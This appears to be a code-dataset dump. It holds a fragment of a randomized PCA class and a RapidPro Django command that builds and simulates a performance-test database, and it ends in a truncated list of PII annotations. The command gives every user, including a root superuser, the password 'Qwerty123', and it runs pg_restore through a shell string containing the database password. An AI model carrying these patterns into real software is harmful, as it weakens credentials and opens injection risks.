def __init__(self, n_components=None, copy=True, iterated_power=3,
whiten=False, random_state=None):
self.n_components = n_components
self.copy = copy
self.iterated_power = iterated_power
self.whiten = whiten
self.mean_ = None
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
self._fit(X)
return self
def _fit(self, X):
"""Fit the model to the data X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
X : ndarray, shape (n_samples, n_features)
The input data, copied, centered and whitened when requested.
"""
random_state = check_random_state(self.random_state)
if hasattr(X, 'todense'):
warnings.warn("Sparse matrix support is deprecated"
" and will be dropped in 0.16."
" Use TruncatedSVD instead.",
DeprecationWarning)
else:
# not a sparse matrix, ensure this is a 2D array
X = np.atleast_2d(as_float_array(X, copy=self.copy))
n_samples = X.shape[0]
if not hasattr(X, 'todense'):
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
U, S, V = randomized_svd(X, n_components,
n_iter=self.iterated_power,
random_state=random_state)
self.explained_variance_ = exp_var = (S ** 2) / n_samples
self.explained_variance_ratio_ = exp_var / exp_var.sum()
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
return X
def transform(self, X, y=None):
"""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
# XXX remove scipy.sparse support here in 0.16
X = atleast2d_or_csr(X)
if self.mean_ is not None:
X = X - self.mean_
X = safe_sparse_dot(X, self.components_.T)
return X
def fit_transform(self, X, y=None):
"""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
X = self._fit(atleast2d_or_csr(X))
X = safe_sparse_dot(X, self.components_.T)
return X
def inverse_transform(self, X, y=None):
"""Transform data back to its original space.
Returns an array X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples is the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation of transform.
"""
# XXX remove scipy.sparse support here in 0.16
X_original = safe_sparse_dot(X, self.components_)
if self.mean_ is not None:
X_original = X_original + self.mean_
return X_original
86,"from __future__ import unicode_literals, division, print_function
import json
import math
import pytz
import random
import resource
import six
import sys
import time
import uuid
from collections import defaultdict
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import User
from django.core.management import BaseCommand, CommandError
from django.core.management.base import CommandParser
from django.db import connection, transaction
from django.utils import timezone
from django_redis import get_redis_connection
from subprocess import check_call, CalledProcessError
from temba.channels.models import Channel
from temba.channels.tasks import squash_channelcounts
from temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME
from temba.flows.models import FlowStart, FlowRun
from temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages
from temba.locations.models import AdminBoundary
from temba.msgs.models import Label, Msg
from temba.msgs.tasks import squash_labelcounts
from temba.orgs.models import Org
from temba.orgs.tasks import squash_topupcredits
from temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms
from temba.values.models import Value
# maximum age in days of database content
CONTENT_AGE = 3 * 365
# every user will have this password including the superuser
USER_PASSWORD = ""Qwerty123""
# database dump containing admin boundary records
LOCATIONS_DUMP = 'test-data/nigeria.bin'
# organization names are generated from these components
ORG_NAMES = (
(""UNICEF"", ""WHO"", ""WFP"", ""UNESCO"", ""UNHCR"", ""UNITAR"", ""FAO"", ""UNEP"", ""UNAIDS"", ""UNDAF""),
(""Nigeria"", ""Chile"", ""Indonesia"", ""Rwanda"", ""Mexico"", ""Zambia"", ""India"", ""Brazil"", ""Sudan"", ""Mozambique"")
)
# the users, channels, groups, labels and fields to create for each organization
USERS = (
{'username': ""admin%d"", 'email': dummy@email.com"", 'role': 'administrators'},
{'username': ""editor%d"", 'email': dummy@email.com"", 'role': 'editors'},
{'username': ""viewer%d"", 'email': dummy@email.com"", 'role': 'viewers'},
{'username': ""surveyor%d"", 'email': dummy@email.com"", 'role': 'surveyors'},
)
CHANNELS = (
{'name': ""Android"", 'channel_type': Channel.TYPE_ANDROID, 'scheme': 'tel', 'address': ""1234""},
{'name': ""Nexmo"", 'channel_type': Channel.TYPE_NEXMO, 'scheme': 'tel', 'address': ""2345""},
{'name': ""Twitter"", 'channel_type': 'TT', 'scheme': 'twitter', 'address': ""my_handle""},
)
FIELDS = (
{'key': 'gender', 'label': ""Gender"", 'value_type': Value.TYPE_TEXT},
{'key': 'age', 'label': ""Age"", 'value_type': Value.TYPE_DECIMAL},
{'key': 'joined', 'label': ""Joined On"", 'value_type': Value.TYPE_DATETIME},
{'key': 'ward', 'label': ""Ward"", 'value_type': Value.TYPE_WARD},
{'key': 'district', 'label': ""District"", 'value_type': Value.TYPE_DISTRICT},
{'key': 'state', 'label': ""State"", 'value_type': Value.TYPE_STATE},
)
GROUPS = (
{'name': ""Reporters"", 'query': None, 'member': 0.95}, # member is either a probability or callable
{'name': ""Farmers"", 'query': None, 'member': 0.5},
{'name': ""Doctors"", 'query': None, 'member': 0.4},
{'name': ""Teachers"", 'query': None, 'member': 0.3},
{'name': ""Drivers"", 'query': None, 'member': 0.2},
{'name': ""Testers"", 'query': None, 'member': 0.1},
{'name': ""Empty"", 'query': None, 'member': 0.0},
{'name': ""Youth (Dynamic)"", 'query': 'age <= 18', 'member': lambda c: c['age'] and c['age'] <= 18},
{'name': ""Unregistered (Dynamic)"", 'query': 'joined = """"', 'member': lambda c: not c['joined']},
{'name': ""Districts (Dynamic)"", 'query': 'district=Faskari or district=Zuru or district=Anka',
'member': lambda c: c['district'] and c['district'].name in (""Faskari"", ""Zuru"", ""Anka"")},
)
LABELS = (""Reporting"", ""Testing"", ""Youth"", ""Farming"", ""Health"", ""Education"", ""Trade"", ""Driving"", ""Building"", ""Spam"")
FLOWS = (
{'name': ""Favorites"", 'file': ""favorites.json"", 'templates': (
[""blue"", ""mutzig"", ""bob""],
[""orange"", ""green"", ""primus"", ""jeb""],
)},
{'name': ""SMS Form"", 'file': ""sms_form.json"", 'templates': ([""22 F Seattle""], [""35 M MIAMI""])},
{'name': ""Pick a Number"", 'file': ""pick_a_number.json"", 'templates': ([""1""], [""4""], [""5""], [""7""], [""8""])}
)
# contact names are generated from these components
CONTACT_NAMES = (
("""", ""Anne"", ""Bob"", ""Cathy"", ""Dave"", ""Evan"", ""Freda"", ""George"", ""Hallie"", ""Igor""),
("""", ""Jameson"", ""Kardashian"", ""Lopez"", ""Mooney"", ""Newman"", ""O'Shea"", ""Poots"", ""Quincy"", ""Roberts""),
)
CONTACT_LANGS = (None, ""eng"", ""fre"", ""spa"", ""kin"")
CONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number
CONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle
CONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped
CONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked
CONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted
CONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact
RUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to
INBOX_MESSAGES = ((""What is"", ""I like"", ""No""), (""beer"", ""tea"", ""coffee""), (""thank you"", ""please"", ""today""))
class Command(BaseCommand):
COMMAND_GENERATE = 'generate'
COMMAND_SIMULATE = 'simulate'
help = ""Generates a database suitable for performance testing""
def add_arguments(self, parser):
cmd = self
subparsers = parser.add_subparsers(dest='command', help='Command to perform',
parser_class=lambda **kw: CommandParser(cmd, **kw))
gen_parser = subparsers.add_parser('generate', help='Generates a clean testing database')
gen_parser.add_argument('--orgs', type=int, action='store', dest='num_orgs', default=100)
gen_parser.add_argument('--contacts', type=int, action='store', dest='num_contacts', default=1000000)
gen_parser.add_argument('--seed', type=int, action='store', dest='seed', default=None)
sim_parser = subparsers.add_parser('simulate', help='Simulates activity on an existing database')
sim_parser.add_argument('--runs', type=int, action='store', dest='num_runs', default=500)
def handle(self, command, *args, **kwargs):
start = time.time()
if command == self.COMMAND_GENERATE:
self.handle_generate(kwargs['num_orgs'], kwargs['num_contacts'], kwargs['seed'])
else:
self.handle_simulate(kwargs['num_runs'])
time_taken = time.time() - start
self._log(""Completed in %d secs, peak memory usage: %d MiB\n"" % (int(time_taken), int(self.peak_memory())))
def handle_generate(self, num_orgs, num_contacts, seed):
""""""
Creates a clean database
""""""
seed = self.configure_random(num_orgs, seed)
self._log(""Generating random base database (seed=%d)...\n"" % seed)
try:
has_data = Org.objects.exists()
except Exception: # pragma: no cover
raise CommandError(""Run migrate command first to create database tables"")
if has_data:
raise CommandError(""Can't generate content in non-empty database."")
self.batch_size = 5000
# the timespan being modelled by this database
self.db_ends_on = timezone.now()
self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE)
# this is a new database so clear out redis
self._log(""Clearing out Redis cache... "")
r = get_redis_connection()
r.flushdb()
self._log(self.style.SUCCESS(""OK"") + '\n')
superuser = User.objects.create_superuser(""root"", dummy@email.com"", USER_PASSWORD)
country, locations = self.load_locations(LOCATIONS_DUMP)
orgs = self.create_orgs(superuser, country, num_orgs)
self.create_users(orgs)
self.create_channels(orgs)
self.create_fields(orgs)
self.create_groups(orgs)
self.create_labels(orgs)
self.create_flows(orgs)
self.create_contacts(orgs, locations, num_contacts)
def handle_simulate(self, num_runs):
""""""
Prepares to resume simulating flow activity on an existing database
""""""
self._log(""Resuming flow activity simulation on existing database...\n"")
orgs = list(Org.objects.order_by('id'))
if not orgs:
raise CommandError(""Can't simulate activity on an empty database"")
self.configure_random(len(orgs))
# in real life Nexmo messages are throttled, but that's not necessary for this simulation
del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO]['max_tps']
inputs_by_flow_name = {f['name']: f['templates'] for f in FLOWS}
self._log(""Preparing existing orgs... "")
for org in orgs:
flows = list(org.flows.order_by('id'))
for flow in flows:
flow.input_templates = inputs_by_flow_name[flow.name]
org.cache = {
'users': list(org.get_org_users().order_by('id')),
'channels': list(org.channels.order_by('id')),
'groups': list(ContactGroup.user_groups.filter(org=org).order_by('id')),
'flows': flows,
'contacts': list(org.org_contacts.values_list('id', flat=True)), # only ids to save memory
'activity': None
}
self._log(self.style.SUCCESS(""OK"") + '\n')
self.simulate_activity(orgs, num_runs)
def configure_random(self, num_orgs, seed=None):
if not seed:
seed = random.randrange(0, 65536)
self.random = random.Random(seed)
# monkey patch uuid4 so it returns the same UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101
from temba.utils import models
models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62)))
# We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a
# bias toward the beginning orgs. If there are N orgs, then the amount of content the first org will be
# allocated is (1/N) ^ (1/bias). This sets the bias so that the first org will get ~50% of the content:
self.org_bias = math.log(1.0 / num_orgs, 0.5)
return seed
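# Illustrative sketch, not part of the original command: the bias above is
# chosen so that the first org's share (1/N) ** (1/bias) is exactly 0.5 for
# any N, because bias = log(1/N, 0.5) makes the exponents cancel:
#
#   import math
#   N = 100
#   bias = math.log(1.0 / N, 0.5)      # ~6.64
#   share = (1.0 / N) ** (1.0 / bias)  # 0.5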
def load_locations(self, path):
""""""
Loads admin boundary records from the given dump of that table
""""""
self._log(""Loading locations from %s... "" % path)
# load dump into current db with pg_restore
db_config = settings.DATABASES['default']
try:
check_call('export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s' %
(db_config['PASSWORD'], db_config['USER'], db_config['NAME'], path), shell=True)
except CalledProcessError: # pragma: no cover
raise CommandError(""Error occurred whilst calling pg_restore to load locations dump"")
# fetch as tuples of (WARD, DISTRICT, STATE)
wards = AdminBoundary.objects.filter(level=3).prefetch_related('parent', 'parent__parent')
locations = [(w, w.parent, w.parent.parent) for w in wards]
country = AdminBoundary.objects.filter(level=0).get()
self._log(self.style.SUCCESS(""OK"") + '\n')
return country, locations
def create_orgs(self, superuser, country, num_total):
""""""
Creates and initializes the orgs
""""""
self._log(""Creating %d orgs... "" % num_total)
org_names = ['%s %s' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]]
self.random.shuffle(org_names)
orgs = []
for o in range(num_total):
orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones),
brand='rapidpro.io', country=country,
created_on=self.db_begins_on, created_by=superuser, modified_by=superuser))
Org.objects.bulk_create(orgs)
orgs = list(Org.objects.order_by('id'))
self._log(self.style.SUCCESS(""OK"") + ""\nInitializing orgs... "")
for o, org in enumerate(orgs):
org.initialize(topup_size=max((1000 - o), 1) * 1000)
# we'll cache some metadata on each org as it's created to save re-fetching things
org.cache = {
'users': [],
'fields': {},
'groups': [],
'system_groups': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)},
}
self._log(self.style.SUCCESS(""OK"") + '\n')
return orgs
def create_users(self, orgs):
""""""
Creates a user of each type for each org
""""""
self._log(""Creating %d users... "" % (len(orgs) * len(USERS)))
# create users for each org
for org in orgs:
for u in USERS:
user = User.objects.create_user(u['username'] % org.id, u['email'] % org.id, USER_PASSWORD)
getattr(org, u['role']).add(user)
user.set_org(org)
org.cache['users'].append(user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_channels(self, orgs):
""""""
Creates the channels for each org
""""""
self._log(""Creating %d channels... "" % (len(orgs) * len(CHANNELS)))
for org in orgs:
user = org.cache['users'][0]
for c in CHANNELS:
Channel.objects.create(org=org, name=c['name'], channel_type=c['channel_type'],
address=c['address'], schemes=[c['scheme']],
created_by=user, modified_by=user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_fields(self, orgs):
""""""
Creates the contact fields for each org
""""""
self._log(""Creating %d fields... "" % (len(orgs) * len(FIELDS)))
for org in orgs:
user = org.cache['users'][0]
for f in FIELDS:
field = ContactField.objects.create(org=org, key=f['key'], label=f['label'],
value_type=f['value_type'], show_in_table=True,
created_by=user, modified_by=user)
org.cache['fields'][f['key']] = field
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_groups(self, orgs):
""""""
Creates the contact groups for each org
""""""
self._log(""Creating %d groups... "" % (len(orgs) * len(GROUPS)))
for org in orgs:
user = org.cache['users'][0]
for g in GROUPS:
if g['query']:
group = ContactGroup.create_dynamic(org, user, g['name'], g['query'])
else:
group = ContactGroup.user_groups.create(org=org, name=g['name'], created_by=user, modified_by=user)
group.member = g['member']
group.count = 0
org.cache['groups'].append(group)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_labels(self, orgs):
""""""
Creates the message labels for each org
""""""
self._log(""Creating %d labels... "" % (len(orgs) * len(LABELS)))
for org in orgs:
user = org.cache['users'][0]
for name in LABELS:
Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_flows(self, orgs):
""""""
Creates the flows for each org
""""""
self._log(""Creating %d flows... "" % (len(orgs) * len(FLOWS)))
for org in orgs:
user = org.cache['users'][0]
for f in FLOWS:
with open('media/test_flows/' + f['file'], 'r') as flow_file:
org.import_app(json.load(flow_file), user)
self._log(self.style.SUCCESS(""OK"") + '\n')
def create_contacts(self, orgs, locations, num_contacts):
""""""
Creates test and regular contacts for this database. Contacts are built from flat dict
representations in batches, to avoid holding all contact and URN objects in memory.
""""""
group_counts = defaultdict(int)
self._log(""Creating %d test contacts..."" % (len(orgs) * len(USERS)))
for org in orgs:
test_contacts = []
for user in org.cache['users']:
test_contacts.append(Contact.get_test_contact(user))
org.cache['test_contacts'] = test_contacts
self._log(self.style.SUCCESS(""OK"") + '\n')
self._log(""Creating %d regular contacts...\n"" % num_contacts)
# disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed
# count row for every contact
with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through):
names = [('%s %s' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]]
names = [n if n else None for n in names]
batch_num = 1
for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size):
batch = []
# generate flat representations and contact objects for this batch
for c_index in index_batch: # pragma: no cover
org = self.random_org(orgs)
name = self.random_choice(names)
location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None
created_on = self.timeline_date(c_index / num_contacts)
c = {
'org': org,
'user': org.cache['users'][0],
'name': name,
'groups': [],
'tel': '+2507%08d' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None,
'twitter': '%s%d' % (name.replace(' ', '_').lower() if name else 'tweep', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None,
'gender': self.random_choice(('M', 'F')) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'age': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'joined': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'ward': location[0] if location else None,
'district': location[1] if location else None,
'state': location[2] if location else None,
'language': self.random_choice(CONTACT_LANGS),
'is_stopped': self.probability(CONTACT_IS_STOPPED_PROB),
'is_blocked': self.probability(CONTACT_IS_BLOCKED_PROB),
'is_active': self.probability(1 - CONTACT_IS_DELETED_PROB),
'created_on': created_on,
'modified_on': self.random_date(created_on, self.db_ends_on),
}
# work out which system groups this contact belongs to
if c['is_active']:
if not c['is_blocked'] and not c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_ALL])
if c['is_blocked']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_BLOCKED])
if c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_STOPPED])
# let each user group decide if it is taking this contact
for g in org.cache['groups']:
if g.member(c) if callable(g.member) else self.probability(g.member):
c['groups'].append(g)
# track changes to group counts
for g in c['groups']:
group_counts[g] += 1
batch.append(c)
self._create_contact_batch(batch)
self._log("" > Created batch %d of %d\n"" % (batch_num, max(num_contacts // self.batch_size, 1)))
batch_num += 1
# create group count records manually
counts = []
for group, count in group_counts.items():
counts.append(ContactGroupCount(group=group, count=count, is_squashed=True))
group.count = count
ContactGroupCount.objects.bulk_create(counts)
def _create_contact_batch(self, batch):
""""""
Bulk creates a batch of contacts from flat representations
""""""
for c in batch:
c['object'] = Contact(org=c['org'], name=c['name'], language=c['language'],
is_stopped=c['is_stopped'], is_blocked=c['is_blocked'],
is_active=c['is_active'],
created_by=c['user'], created_on=c['created_on'],
modified_by=c['user'], modified_on=c['modified_on'])
Contact.objects.bulk_create([c['object'] for c in batch])
# now that contacts have pks, bulk create the actual URN, value and group membership objects
batch_urns = []
batch_values = []
batch_memberships = []
for c in batch:
org = c['org']
c['urns'] = []
if c['tel']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TEL_SCHEME,
path=c['tel'], identity=URN.from_tel(c['tel'])))
if c['twitter']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TWITTER_SCHEME,
path=c['twitter'], identity=URN.from_twitter(c['twitter'])))
if c['gender']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['gender'],
string_value=c['gender']))
if c['age']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['age'],
string_value=str(c['age']), decimal_value=c['age']))
if c['joined']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['joined'],
string_value=datetime_to_str(c['joined']), datetime_value=c['joined']))
if c['ward']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['ward'],
string_value=c['ward'].name, location_value=c['ward']))
if c['district']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['district'],
string_value=c['district'].name, location_value=c['district']))
if c['state']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['state'],
string_value=c['state'].name, location_value=c['state']))
for g in c['groups']:
batch_memberships.append(ContactGroup.contacts.through(contact=c['object'], contactgroup=g))
batch_urns += c['urns']
ContactURN.objects.bulk_create(batch_urns)
Value.objects.bulk_create(batch_values)
ContactGroup.contacts.through.objects.bulk_create(batch_memberships)
def simulate_activity(self, orgs, num_runs):
self._log(""Starting simulation. Ctrl+C to cancel...\n"")
runs = 0
while runs < num_runs:
try:
with transaction.atomic():
# make sure every org has an active flow
for org in orgs:
if not org.cache['activity']:
self.start_flow_activity(org)
with transaction.atomic():
org = self.random_org(orgs)
if self.probability(0.1):
self.create_unsolicited_incoming(org)
else:
self.create_flow_run(org)
runs += 1
except KeyboardInterrupt:
self._log(""Shutting down...\n"")
break
squash_channelcounts()
squash_flowpathcounts()
squash_flowruncounts()
prune_recentmessages()
squash_topupcredits()
squash_labelcounts()
def start_flow_activity(self, org):
assert not org.cache['activity']
user = org.cache['users'][0]
flow = self.random_choice(org.cache['flows'])
if self.probability(0.9):
# start a random group using a flow start
group = self.random_choice(org.cache['groups'])
contacts_started = list(group.contacts.values_list('id', flat=True))
self._log("" > Starting flow %s for group %s (%d) in org %s\n""
% (flow.name, group.name, len(contacts_started), org.name))
start = FlowStart.create(flow, user, groups=[group], restart_participants=True)
start.start()
else:
# start a random individual without a flow start
if not org.cache['contacts']:
return
contact = Contact.objects.get(id=self.random_choice(org.cache['contacts']))
contacts_started = [contact.id]
self._log("" > Starting flow %s for contact #%d in org %s\n"" % (flow.name, contact.id, org.name))
flow.start([], [contact], restart_participants=True)
org.cache['activity'] = {'flow': flow, 'unresponded': contacts_started, 'started': list(contacts_started)}
def end_flow_activity(self, org):
self._log("" > Ending flow %s for in org %s\n"" % (org.cache['activity']['flow'].name, org.name))
org.cache['activity'] = None
runs = FlowRun.objects.filter(org=org, is_active=True)
FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED)
def create_flow_run(self, org):
activity = org.cache['activity']
flow = activity['flow']
if activity['unresponded']:
contact_id = self.random_choice(activity['unresponded'])
activity['unresponded'].remove(contact_id)
contact = Contact.objects.get(id=contact_id)
urn = contact.urns.first()
if urn:
self._log("" > Receiving flow responses for flow %s in org %s\n"" % (flow.name, flow.org.name))
inputs = self.random_choice(flow.input_templates)
for text in inputs:
channel = flow.org.cache['channels'][0]
Msg.create_incoming(channel, six.text_type(urn), text)
# if more than 10% of contacts have responded, consider flow activity over
if len(activity['unresponded']) <= (len(activity['started']) * 0.9):
self.end_flow_activity(flow.org)
def create_unsolicited_incoming(self, org):
if not org.cache['contacts']:
return
self._log("" > Receiving unsolicited incoming message in org %s\n"" % org.name)
available_contacts = list(set(org.cache['contacts']) - set(org.cache['activity']['started']))
if available_contacts:
contact = Contact.objects.get(id=self.random_choice(available_contacts))
channel = self.random_choice(org.cache['channels'])
urn = contact.urns.first()
if urn:
text = ' '.join([self.random_choice(l) for l in INBOX_MESSAGES])
Msg.create_incoming(channel, six.text_type(urn), text)
def probability(self, prob):
return self.random.random() < prob
def random_choice(self, seq, bias=1.0):
if not seq:
raise ValueError(""Can't select random item from empty sequence"")
return seq[int(math.pow(self.random.random(), bias) * len(seq))]
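# Illustrative sketch, not part of the original command: random.random() is
# uniform on [0, 1) and math.pow(u, bias) with bias > 1 pushes values toward
# 0, so a higher bias favours the front of the sequence:
#
#   rnd = random.Random(1)
#   picks = [int(math.pow(rnd.random(), 3.0) * 10) for _ in range(1000)]
#   # picks cluster near index 0; with bias=1.0 they would be uniform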
def weighted_choice(self, seq, weights):
r = self.random.random() * sum(weights)
cum_weight = 0.0
for i, item in enumerate(seq):
cum_weight += weights[i]
if r < cum_weight or (i == len(seq) - 1):
return item
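# Illustrative note, not part of the original command: weighted_choice is a
# standard cumulative-weight scan. With seq=('a', 'b') and weights=(1, 3),
# r is uniform on [0, 4), so 'a' is returned ~25% of the time and 'b' ~75%;
# the final (i == len(seq) - 1) check guards against floating point rounding.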
def random_org(self, orgs):
""""""
Returns a random org with bias toward the orgs with the lowest indexes
""""""
return self.random_choice(orgs, bias=self.org_bias)
def random_date(self, start=None, end=None):
if not end:
end = timezone.now()
if not start:
start = end - timedelta(days=365)
if start == end:
return end
return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end)))
def timeline_date(self, dist):
""""""
Converts a 0..1 distance into a date on this database's overall timeline
""""""
seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds()
return self.db_begins_on + timedelta(seconds=(seconds_span * dist))
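# Illustrative note, not part of the original command: timeline_date is a
# linear interpolation over the modelled timespan, so dist=0.0 maps to
# db_begins_on, dist=0.5 to the midpoint, and dist=1.0 to db_ends_on.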
@staticmethod
def peak_memory():
rusage_denom = 1024
if sys.platform == 'darwin':
# OSX gives value in bytes, other OSes in kilobytes
rusage_denom *= rusage_denom
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
def _log(self, text):
self.stdout.write(text, ending='')
self.stdout.flush()
class DisableTriggersOn(object):
""""""
Helper context manager for temporarily disabling database triggers for a given model
""""""
def __init__(self, *models):
self.tables = [m._meta.db_table for m in models]
def __enter__(self):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s DISABLE TRIGGER ALL;' % table)
def __exit__(self, exc_type, exc_val, exc_tb):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s ENABLE TRIGGER ALL;' % table)
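# Illustrative usage sketch, not part of the original module; model names
# follow the imports above and the contacts variable is hypothetical:
#
#   with DisableTriggersOn(Contact, ContactURN):
#       Contact.objects.bulk_create(contacts)  # inserts skip row triggers
#
# __exit__ re-enables the triggers even if the block raises, because context
# manager exits always run when the with-block unwinds.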
",30703,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'django_redis'], ['LOCATION', 'URN'], ['LOCATION', 'ms_to_datetime'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'Chile'], ['LOCATION', 'Indonesia'], ['LOCATION', 'Rwanda'], ['LOCATION', 'Mexico'], ['LOCATION', 'Zambia'], ['LOCATION', 'India'], ['LOCATION', 'Brazil'], ['LOCATION', 'Sudan'], ['LOCATION', 'TYPE_ANDROID'], ['LOCATION', 'Faskari'], ['LOCATION', 'Zuru'], ['PERSON', 'Anka'], ['PERSON', ""c['district'].name""], ['PERSON', 'Anka'], ['PERSON', 'LABELS'], ['PERSON', 'jeb'], ['PERSON', 'Anne'], ['PERSON', 'Bob'], ['PERSON', 'Cathy'], ['PERSON', 'Dave'], ['PERSON', 'Evan'], ['PERSON', 'George'], ['PERSON', 'Igor'], ['PERSON', 'Jameson'], ['PERSON', 'Lopez'], ['PERSON', 'Mooney'], ['PERSON', 'Roberts'], ['NRP', 'CONTACT_HAS_TWITTER_PROB'], ['DATE_TIME', 'today'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'DISTRICT'], ['LOCATION', 'USER_PASSWORD'], ['NRP', ""org.cache['users'].append(user""], ['PERSON', 'len(CHANNELS'], ['PERSON', 'group.member'], ['PERSON', 'LABELS'], ['NRP', 'index_batch'], ['PERSON', 'tweep'], ['LOCATION', 'group.name'], ['PERSON', 'darwin'], ['DATE_TIME', 'RUSAGE_SELF).ru_maxrss / rusage_denom'], ['URL', 'https://github.com/joke2k/faker/issues/484#issuecomment-287931101'], ['URL', 'django.co'], ['URL', 'django.contrib.auth.mo'], ['URL', 'django.core.ma'], ['URL', 'django.core.management.ba'], ['URL', 'temba.channels.mo'], ['URL', 'temba.ch'], ['URL', 'temba.contacts.mo'], ['URL', 'temba.flows.mo'], ['URL', 'temba.locations.mo'], ['URL', 'temba.msgs.mo'], ['URL', 'temba.ms'], ['URL', 'temba.orgs.mo'], ['URL', 'temba.org'], ['URL', 'temba.values.mo'], ['URL', 'nigeria.bi'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'self.COM'], ['URL', 'self.pe'], ['URL', 'self.co'], ['URL', 'self.ba'], ['URL', 'timezone.no'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'email.com'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.co'], ['URL', 'Channel.CH'], ['URL', 'flow.in'], ['URL', 'flow.na'], ['URL', 'org.ca'], ['URL', 'org.ge'], ['URL', 'org.ch'], ['URL', 'ContactGroup.us'], ['URL', 'groups.fi'], ['URL', 'org.org'], ['URL', 'contacts.va'], ['URL', 'self.style.SU'], ['URL', 'self.si'], ['URL', 'self.random.ge'], ['URL', 'self.org'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'w.pa'], ['URL', 'w.parent.pa'], ['URL', 